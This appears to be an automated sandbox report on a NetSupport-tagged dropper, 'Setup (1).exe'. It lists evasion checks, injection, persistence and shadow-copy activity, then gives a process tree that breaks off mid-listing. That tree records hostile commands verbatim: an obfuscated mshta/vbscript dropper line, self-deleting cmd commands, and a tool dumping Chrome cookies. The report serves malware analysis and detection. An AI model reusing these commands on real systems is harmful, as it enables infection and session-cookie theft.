netsupport | 1cd649ea4273fd977b6a350bfe8f3b62f1d0aee1408b9966aa3d6ad39ba5af6a

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	CDLZVrUaVp4YVmypntsD4WsF.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	id_H6z9XqurYoeY5OdGzQi7M.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	id_H6z9XqurYoeY5OdGzQi7M.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	MdsGwXIxjqpjA5f32VkUNxw5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	MdsGwXIxjqpjA5f32VkUNxw5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wXGk94iPJr2Ikj1_qGkhwEpH.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	wXGk94iPJr2Ikj1_qGkhwEpH.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	CDLZVrUaVp4YVmypntsD4WsF.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	Setup (1).exe

Loads dropped DLL 3 IoCs

pid	Process
3408	ADHcy44K0ApF6cMEGpkA3cNN.exe
4744	ultramediaburner.exe
4744	ultramediaburner.exe

Themida packer 10 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral1/files/0x000100000001ab92-175.dat	themida
behavioral1/files/0x000100000001ab9f-184.dat	themida
behavioral1/files/0x000100000001ab92-195.dat	themida
behavioral1/files/0x000100000001ab9f-210.dat	themida
behavioral1/files/0x000100000001abad-222.dat	themida
behavioral1/files/0x000100000001abae-254.dat	themida
behavioral1/memory/3160-258-0x0000000000B20000-0x0000000000B21000-memory.dmp	themida
behavioral1/memory/4140-278-0x0000000001130000-0x0000000001131000-memory.dmp	themida
behavioral1/files/0x000100000001abad-244.dat	themida
behavioral1/files/0x000100000001abae-225.dat	themida

Checks whether UAC is enabled 1 TTPs 4 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	id_H6z9XqurYoeY5OdGzQi7M.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	wXGk94iPJr2Ikj1_qGkhwEpH.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	CDLZVrUaVp4YVmypntsD4WsF.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	MdsGwXIxjqpjA5f32VkUNxw5.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 21 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
218	ipinfo.io
136	ip-api.com
145	ipinfo.io
184	freegeoip.app
191	freegeoip.app
382	ip-api.com
412	ipinfo.io
414	ipinfo.io
554	geoiptool.com
29	ipinfo.io
147	ipinfo.io
205	freegeoip.app
228	ipinfo.io
602	freegeoip.app
604	freegeoip.app
235	ipinfo.io
32	api.db-ip.com
33	api.db-ip.com
186	freegeoip.app
231	ipinfo.io
28	ipinfo.io

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

pid	Process
3160	wXGk94iPJr2Ikj1_qGkhwEpH.exe
4140	CDLZVrUaVp4YVmypntsD4WsF.exe
4616	MdsGwXIxjqpjA5f32VkUNxw5.exe
4648	id_H6z9XqurYoeY5OdGzQi7M.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1192 set thread context of 4572	1192	YdcTcGHg1ADg85I838tljk7T.exe	108
PID 3844 set thread context of 4700	3844	FlcudmvkDUbtbt3t958L_EBp.exe	110
PID 880 set thread context of 3416	880	installer.exe	125

Drops file in Program Files directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Company\NewProduct\customer3.exe	WerFault.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe	WerFault.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\jooyu.exe	WerFault.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\Uninstall.exe	WerFault.exe
File created	C:\Program Files (x86)\Company\NewProduct\Uninstall.ini	WerFault.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 35 IoCs

pid	pid_target	Process	procid_target
3928	4496	WerFault.exe	105
4832	4496	WerFault.exe	105
5124	4496	WerFault.exe	105
5132	2956	WerFault.exe	88
5584	4496	WerFault.exe	105
5640	2956	WerFault.exe	88
2160	612	WerFault.exe	101
5896	2956	WerFault.exe	88
6088	4076	WerFault.exe	96
5256	2956	WerFault.exe	88
5300	2956	WerFault.exe	88
5324	4076	WerFault.exe	96
4472	4076	WerFault.exe	96
4996	2956	WerFault.exe	88
5400	4496	WerFault.exe	105
5764	2956	WerFault.exe	88
4472	4076	WerFault.exe	96
4792	4076	WerFault.exe	96
1264	2956	WerFault.exe	88
6172	2956	WerFault.exe	88
6292	4076	WerFault.exe	96
6424	2956	WerFault.exe	88
6404	4076	WerFault.exe	96
4168	4076	WerFault.exe	96
4312	4216	WerFault.exe	175
716	4216	WerFault.exe	175
1776	4216	WerFault.exe	175
192	2956	WerFault.exe	88
7140	4216	WerFault.exe	175
4264	4216	WerFault.exe	175
7888	4216	WerFault.exe	175
6700	4216	WerFault.exe	175
7432	4216	WerFault.exe	175
3412	4216	WerFault.exe	175
6904	4216	WerFault.exe	175

Checks SCSI registry key(s) 3 TTPs 2 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	FaXFNxXkXkYrMFn8WzUGBuAF.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	FaXFNxXkXkYrMFn8WzUGBuAF.exe

Creates scheduled task(s) 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
6752	schtasks.exe
6868	schtasks.exe
8448	schtasks.exe
10632	schtasks.exe

Interacts with shadow copies 2 TTPs 2 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
7824	vssadmin.exe
10964	vssadmin.exe

Kills process with taskkill 8 IoCs

evasion

pid	Process
4300	taskkill.exe
304	taskkill.exe
7028	taskkill.exe
8228	taskkill.exe
7460	taskkill.exe
8576	taskkill.exe
7932	taskkill.exe
204	taskkill.exe

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery

T1018

pid	Process
6400	PING.EXE
11252	PING.EXE
10200	PING.EXE

Script User-Agent 8 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	230	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	232	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	413	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	418	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	146	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	147	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	151	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	217	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 21 IoCs

pid	Process
4072	Setup (1).exe
4072	Setup (1).exe
3928	WerFault.exe
3928	WerFault.exe
3928	WerFault.exe
3928	WerFault.exe
3928	WerFault.exe
3928	WerFault.exe
3928	WerFault.exe
3928	WerFault.exe
3928	WerFault.exe
3928	WerFault.exe
3928	WerFault.exe
3928	WerFault.exe
3928	WerFault.exe
3928	WerFault.exe
3928	WerFault.exe
3928	WerFault.exe
3928	WerFault.exe
3928	WerFault.exe
3928	WerFault.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

description	pid	Process
Token: SeDebugPrivilege	520	7_sQ9ztsp0u4lXoJ2NXgIof7.exe
Token: SeDebugPrivilege	3408	ADHcy44K0ApF6cMEGpkA3cNN.exe
Token: SeDebugPrivilege	4128	J8zklQGm41HLBzN6lo9QoCxP.exe
Token: SeDebugPrivilege	1748	N8bjTrnz9NTEI6SIAfWLSqPj.exe
Token: SeDebugPrivilege	4700	FlcudmvkDUbtbt3t958L_EBp.exe
Token: SeDebugPrivilege	4572	YdcTcGHg1ADg85I838tljk7T.exe
Token: SeRestorePrivilege	3928	WerFault.exe
Token: SeBackupPrivilege	3928	WerFault.exe
Token: SeDebugPrivilege	3928	WerFault.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4744	ultramediaburner.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4072 wrote to memory of 520	4072	Setup (1).exe	80
PID 4072 wrote to memory of 520	4072	Setup (1).exe	80
PID 4072 wrote to memory of 520	4072	Setup (1).exe	80
PID 4072 wrote to memory of 3408	4072	Setup (1).exe	79
PID 4072 wrote to memory of 3408	4072	Setup (1).exe	79
PID 4072 wrote to memory of 828	4072	Setup (1).exe	81
PID 4072 wrote to memory of 828	4072	Setup (1).exe	81
PID 4072 wrote to memory of 828	4072	Setup (1).exe	81
PID 4072 wrote to memory of 928	4072	Setup (1).exe	84
PID 4072 wrote to memory of 928	4072	Setup (1).exe	84
PID 4072 wrote to memory of 928	4072	Setup (1).exe	84
PID 4072 wrote to memory of 1172	4072	Setup (1).exe	83
PID 4072 wrote to memory of 1172	4072	Setup (1).exe	83
PID 4072 wrote to memory of 1172	4072	Setup (1).exe	83
PID 4072 wrote to memory of 1192	4072	Setup (1).exe	82
PID 4072 wrote to memory of 1192	4072	Setup (1).exe	82
PID 4072 wrote to memory of 1192	4072	Setup (1).exe	82
PID 4072 wrote to memory of 1748	4072	Setup (1).exe	103
PID 4072 wrote to memory of 1748	4072	Setup (1).exe	103
PID 4072 wrote to memory of 1748	4072	Setup (1).exe	103
PID 4072 wrote to memory of 612	4072	Setup (1).exe	101
PID 4072 wrote to memory of 612	4072	Setup (1).exe	101
PID 4072 wrote to memory of 612	4072	Setup (1).exe	101
PID 4072 wrote to memory of 1016	4072	Setup (1).exe	87
PID 4072 wrote to memory of 1016	4072	Setup (1).exe	87
PID 4072 wrote to memory of 3132	4072	Setup (1).exe	100
PID 4072 wrote to memory of 3132	4072	Setup (1).exe	100
PID 4072 wrote to memory of 3132	4072	Setup (1).exe	100
PID 4072 wrote to memory of 880	4072	Setup (1).exe	333
PID 4072 wrote to memory of 880	4072	Setup (1).exe	333
PID 4072 wrote to memory of 880	4072	Setup (1).exe	333
PID 4072 wrote to memory of 2956	4072	Setup (1).exe	88
PID 4072 wrote to memory of 2956	4072	Setup (1).exe	88
PID 4072 wrote to memory of 2956	4072	Setup (1).exe	88
PID 4072 wrote to memory of 3844	4072	Setup (1).exe	97
PID 4072 wrote to memory of 3844	4072	Setup (1).exe	97
PID 4072 wrote to memory of 3844	4072	Setup (1).exe	97
PID 4072 wrote to memory of 4076	4072	Setup (1).exe	96
PID 4072 wrote to memory of 4076	4072	Setup (1).exe	96
PID 4072 wrote to memory of 4076	4072	Setup (1).exe	96
PID 4072 wrote to memory of 3160	4072	Setup (1).exe	95
PID 4072 wrote to memory of 3160	4072	Setup (1).exe	95
PID 4072 wrote to memory of 3160	4072	Setup (1).exe	95
PID 4072 wrote to memory of 4128	4072	Setup (1).exe	94
PID 4072 wrote to memory of 4128	4072	Setup (1).exe	94
PID 4072 wrote to memory of 4140	4072	Setup (1).exe	93
PID 4072 wrote to memory of 4140	4072	Setup (1).exe	93
PID 4072 wrote to memory of 4140	4072	Setup (1).exe	93
PID 4072 wrote to memory of 4220	4072	Setup (1).exe	90
PID 4072 wrote to memory of 4220	4072	Setup (1).exe	90
PID 4072 wrote to memory of 4220	4072	Setup (1).exe	90
PID 4072 wrote to memory of 4460	4072	Setup (1).exe	107
PID 4072 wrote to memory of 4460	4072	Setup (1).exe	107
PID 4072 wrote to memory of 4460	4072	Setup (1).exe	107
PID 4072 wrote to memory of 4480	4072	Setup (1).exe	106
PID 4072 wrote to memory of 4480	4072	Setup (1).exe	106
PID 4072 wrote to memory of 4480	4072	Setup (1).exe	106
PID 4072 wrote to memory of 4496	4072	Setup (1).exe	105
PID 4072 wrote to memory of 4496	4072	Setup (1).exe	105
PID 4072 wrote to memory of 4496	4072	Setup (1).exe	105
PID 1192 wrote to memory of 4572	1192	YdcTcGHg1ADg85I838tljk7T.exe	108
PID 1192 wrote to memory of 4572	1192	YdcTcGHg1ADg85I838tljk7T.exe	108
PID 1192 wrote to memory of 4572	1192	YdcTcGHg1ADg85I838tljk7T.exe	108
PID 4072 wrote to memory of 4616	4072	Setup (1).exe	184

C:\Users\Admin\AppData\Local\Temp\Setup (1).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (1).exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4072
- C:\Users\Admin\Documents\ADHcy44K0ApF6cMEGpkA3cNN.exe
  "C:\Users\Admin\Documents\ADHcy44K0ApF6cMEGpkA3cNN.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
  PID:3408
- C:\Users\Admin\Documents\7_sQ9ztsp0u4lXoJ2NXgIof7.exe
  "C:\Users\Admin\Documents\7_sQ9ztsp0u4lXoJ2NXgIof7.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:520
- - C:\Users\Admin\Documents\7_sQ9ztsp0u4lXoJ2NXgIof7.exe
    "C:\Users\Admin\Documents\7_sQ9ztsp0u4lXoJ2NXgIof7.exe"
    3⤵
    PID:4508
- C:\Users\Admin\Documents\V8JNzJOqyTcCFJCV2ktX6f7k.exe
  "C:\Users\Admin\Documents\V8JNzJOqyTcCFJCV2ktX6f7k.exe"
  2⤵
  - Executes dropped EXE
  PID:828
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\2904465351.exe"
    3⤵
    PID:5216
  - - C:\Users\Admin\AppData\Local\Temp\2904465351.exe
      "C:\Users\Admin\AppData\Local\Temp\2904465351.exe"
      4⤵
      PID:5968
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\9094260453.exe"
    3⤵
    PID:8084
  - - C:\Users\Admin\AppData\Local\Temp\9094260453.exe
      "C:\Users\Admin\AppData\Local\Temp\9094260453.exe"
      4⤵
      PID:8112
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im "V8JNzJOqyTcCFJCV2ktX6f7k.exe" /f & erase "C:\Users\Admin\Documents\V8JNzJOqyTcCFJCV2ktX6f7k.exe" & exit
    3⤵
    PID:5348
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /im "V8JNzJOqyTcCFJCV2ktX6f7k.exe" /f
      4⤵
      Kills process with taskkill
      PID:304
- C:\Users\Admin\Documents\YdcTcGHg1ADg85I838tljk7T.exe
  "C:\Users\Admin\Documents\YdcTcGHg1ADg85I838tljk7T.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:1192
- - C:\Users\Admin\Documents\YdcTcGHg1ADg85I838tljk7T.exe
    C:\Users\Admin\Documents\YdcTcGHg1ADg85I838tljk7T.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4572
- C:\Users\Admin\Documents\y22xJuNwCBLbFp87x7pFQu3E.exe
  "C:\Users\Admin\Documents\y22xJuNwCBLbFp87x7pFQu3E.exe"
  2⤵
  - Executes dropped EXE
  PID:1172
- - C:\Users\Admin\Documents\y22xJuNwCBLbFp87x7pFQu3E.exe
    "C:\Users\Admin\Documents\y22xJuNwCBLbFp87x7pFQu3E.exe" -q
    3⤵
    - Executes dropped EXE
    PID:2784
- C:\Users\Admin\Documents\imnJqNCKqtnJ0H5aawNCzZTY.exe
  "C:\Users\Admin\Documents\imnJqNCKqtnJ0H5aawNCzZTY.exe"
  2⤵
  - Executes dropped EXE
  PID:928
- - C:\Windows\SysWOW64\mshta.exe
    "C:\Windows\System32\mshta.exe" vbSCRipt:ClOSe( creATEoBJEcT("WscRIpT.sHEll" ).RUN("Cmd /Q /C tYPe ""C:\Users\Admin\Documents\imnJqNCKqtnJ0H5aawNCzZTY.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\imnJqNCKqtnJ0H5aawNCzZTY.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 ,TRUE ) )
    3⤵
    PID:5096
- C:\Users\Admin\Documents\MjBnu6M3zvy_3ECmuVsoQk5a.exe
  "C:\Users\Admin\Documents\MjBnu6M3zvy_3ECmuVsoQk5a.exe"
  2⤵
  - Executes dropped EXE
  PID:1016
- C:\Users\Admin\Documents\DejdBqXdB6gINBU938S6EQxj.exe
  "C:\Users\Admin\Documents\DejdBqXdB6gINBU938S6EQxj.exe"
  2⤵
  - Executes dropped EXE
  PID:2956
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2956 -s 760
    3⤵
    - Program crash
    PID:5132
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2956 -s 796
    3⤵
    - Program crash
    PID:5640
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2956 -s 776
    3⤵
    - Program crash
    PID:5896
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2956 -s 796
    3⤵
    - Program crash
    PID:5256
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2956 -s 956
    3⤵
    - Program crash
    PID:5300
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2956 -s 1008
    3⤵
    - Program crash
    PID:4996
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2956 -s 960
    3⤵
    - Program crash
    PID:5764
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2956 -s 1356
    3⤵
    - Program crash
    PID:1264
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2956 -s 1376
    3⤵
    - Program crash
    PID:6172
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2956 -s 1428
    3⤵
    - Program crash
    PID:6424
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2956 -s 1636
    3⤵
    - Program crash
    PID:192
- C:\Users\Admin\Documents\wq59V2f4aLmYc2pNSJBddGBZ.exe
  "C:\Users\Admin\Documents\wq59V2f4aLmYc2pNSJBddGBZ.exe"
  2⤵
  - Executes dropped EXE
  PID:4220
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im "wq59V2f4aLmYc2pNSJBddGBZ.exe" /f & erase "C:\Users\Admin\Documents\wq59V2f4aLmYc2pNSJBddGBZ.exe" & exit
    3⤵
    PID:5944
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /im "wq59V2f4aLmYc2pNSJBddGBZ.exe" /f
      4⤵
      Kills process with taskkill
      PID:4300
- C:\Users\Admin\Documents\CDLZVrUaVp4YVmypntsD4WsF.exe
  "C:\Users\Admin\Documents\CDLZVrUaVp4YVmypntsD4WsF.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:4140
- C:\Users\Admin\Documents\J8zklQGm41HLBzN6lo9QoCxP.exe
  "C:\Users\Admin\Documents\J8zklQGm41HLBzN6lo9QoCxP.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4128
- - C:\Users\Admin\AppData\Roaming\5409505.exe
    "C:\Users\Admin\AppData\Roaming\5409505.exe"
    3⤵
    PID:1080
  - - C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
      "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
      4⤵
      PID:5932
- - C:\Users\Admin\AppData\Roaming\6526483.exe
    "C:\Users\Admin\AppData\Roaming\6526483.exe"
    3⤵
    PID:4160
- - C:\Users\Admin\AppData\Roaming\8419724.exe
    "C:\Users\Admin\AppData\Roaming\8419724.exe"
    3⤵
    PID:1188
- - C:\Users\Admin\AppData\Roaming\4737653.exe
    "C:\Users\Admin\AppData\Roaming\4737653.exe"
    3⤵
    PID:200
- C:\Users\Admin\Documents\wXGk94iPJr2Ikj1_qGkhwEpH.exe
  "C:\Users\Admin\Documents\wXGk94iPJr2Ikj1_qGkhwEpH.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:3160
- C:\Users\Admin\Documents\SRm62YZQrDHleSbwZIKfbvnx.exe
  "C:\Users\Admin\Documents\SRm62YZQrDHleSbwZIKfbvnx.exe"
  2⤵
  - Executes dropped EXE
  PID:4076
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 388
    3⤵
    - Program crash
    PID:6088
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 392
    3⤵
    - Program crash
    PID:5324
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 404
    3⤵
    - Program crash
    PID:4472
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 600
    3⤵
    - Program crash
    PID:4472
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 660
    3⤵
    - Executes dropped EXE
    - Drops file in Program Files directory
    - Program crash
    PID:4792
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 696
    3⤵
    - Program crash
    PID:6292
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 768
    3⤵
    - Program crash
    PID:6404
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 652
    3⤵
    - Program crash
    PID:4168
- - C:\Users\Admin\Documents\SRm62YZQrDHleSbwZIKfbvnx.exe
    "C:\Users\Admin\Documents\SRm62YZQrDHleSbwZIKfbvnx.exe"
    3⤵
    PID:11000
- C:\Users\Admin\Documents\FlcudmvkDUbtbt3t958L_EBp.exe
  "C:\Users\Admin\Documents\FlcudmvkDUbtbt3t958L_EBp.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:3844
- - C:\Users\Admin\Documents\FlcudmvkDUbtbt3t958L_EBp.exe
    C:\Users\Admin\Documents\FlcudmvkDUbtbt3t958L_EBp.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:4700
- C:\Users\Admin\Documents\FaXFNxXkXkYrMFn8WzUGBuAF.exe
  "C:\Users\Admin\Documents\FaXFNxXkXkYrMFn8WzUGBuAF.exe"
  2⤵
  PID:880
- - C:\Users\Admin\Documents\FaXFNxXkXkYrMFn8WzUGBuAF.exe
    "C:\Users\Admin\Documents\FaXFNxXkXkYrMFn8WzUGBuAF.exe"
    3⤵
    - Executes dropped EXE
    - Checks SCSI registry key(s)
    PID:3416
- C:\Users\Admin\Documents\Gk5Pj8hsUDNLarsL0S4nKteg.exe
  "C:\Users\Admin\Documents\Gk5Pj8hsUDNLarsL0S4nKteg.exe"
  2⤵
  - Executes dropped EXE
  PID:3132
- C:\Users\Admin\Documents\TbgdvOwPhk2QR9lcAd7FD02O.exe
  "C:\Users\Admin\Documents\TbgdvOwPhk2QR9lcAd7FD02O.exe"
  2⤵
  - Executes dropped EXE
  PID:612
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 612 -s 480
    3⤵
    - Program crash
    PID:2160
- C:\Users\Admin\Documents\N8bjTrnz9NTEI6SIAfWLSqPj.exe
  "C:\Users\Admin\Documents\N8bjTrnz9NTEI6SIAfWLSqPj.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1748
- C:\Users\Admin\Documents\DZ_nUHeLDRnLljomhIn9zeP9.exe
  "C:\Users\Admin\Documents\DZ_nUHeLDRnLljomhIn9zeP9.exe"
  2⤵
  - Executes dropped EXE
  PID:4496
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 660
    3⤵
    - Program crash
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3928
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 676
    3⤵
    - Program crash
    PID:4832
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 636
    3⤵
    - Program crash
    PID:5124
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 732
    3⤵
    - Program crash
    PID:5584
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4496 -s 1076
    3⤵
    - Program crash
    PID:5400
- C:\Users\Admin\Documents\NDefALUu7hN5GyXJtSp3sHUy.exe
  "C:\Users\Admin\Documents\NDefALUu7hN5GyXJtSp3sHUy.exe"
  2⤵
  - Executes dropped EXE
  PID:4480
- - C:\Users\Admin\AppData\Local\Temp\is-O0SEH.tmp\NDefALUu7hN5GyXJtSp3sHUy.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-O0SEH.tmp\NDefALUu7hN5GyXJtSp3sHUy.tmp" /SL5="$70048,138429,56832,C:\Users\Admin\Documents\NDefALUu7hN5GyXJtSp3sHUy.exe"
    3⤵
    PID:4744
- C:\Users\Admin\Documents\EE8wO27W2URWE24kLbz534Tq.exe
  "C:\Users\Admin\Documents\EE8wO27W2URWE24kLbz534Tq.exe"
  2⤵
  - Executes dropped EXE
  PID:4460
- C:\Users\Admin\Documents\Qx7gdQTN95HYE01efafrkybZ.exe
  "C:\Users\Admin\Documents\Qx7gdQTN95HYE01efafrkybZ.exe"
  2⤵
  PID:4792
- C:\Users\Admin\Documents\id_H6z9XqurYoeY5OdGzQi7M.exe
  "C:\Users\Admin\Documents\id_H6z9XqurYoeY5OdGzQi7M.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:4648
- C:\Users\Admin\Documents\MdsGwXIxjqpjA5f32VkUNxw5.exe
  "C:\Users\Admin\Documents\MdsGwXIxjqpjA5f32VkUNxw5.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:4616

C:\Program Files (x86)\Company\NewProduct\customer3.exe
"C:\Program Files (x86)\Company\NewProduct\customer3.exe"
1⤵
- Executes dropped EXE
PID:2336
- C:\Users\Admin\AppData\Local\Temp\11111.exe
  C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
  2⤵
  PID:7300
- C:\Users\Admin\AppData\Local\Temp\11111.exe
  C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
  2⤵
  PID:7572
- C:\Users\Admin\AppData\Local\Temp\11111.exe
  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
  2⤵
  PID:8184
- C:\Users\Admin\AppData\Local\Temp\11111.exe
